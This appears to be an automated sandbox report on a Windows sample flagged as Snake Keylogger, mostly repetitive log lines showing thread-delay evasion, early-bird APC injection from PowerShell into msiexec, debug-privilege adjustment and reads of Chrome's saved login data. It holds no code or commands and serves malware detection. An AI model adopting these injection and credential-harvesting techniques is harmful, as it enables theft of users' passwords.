Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598364	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598246	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597470	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596101	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595561	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595452	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594359	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7140			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2532			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4192	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6244	Thread sleep count: 2002 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6244	Thread sleep count: 7848 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -598364s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -598246s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -597470s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -596343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -596101s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -595561s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -595452s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -595124s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6192	Thread sleep time: -594359s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,	0_2_004065DA
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059A9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598364	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598246	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597470	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596101	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595561	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595452	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594359	Jump to behavior

Source: msiexec.exe, 00000007.00000002.2760493798.0000000008DCA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAWx

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	API call chain: ExitProcess graph end node			graph_0-3397
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	API call chain: ExitProcess graph end node			graph_0-3550

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_09730000 LdrInitializeThunk,

2_2_09730000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

0_2_0040336C

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000007.00000002.2772117735.00000000247B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5400, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
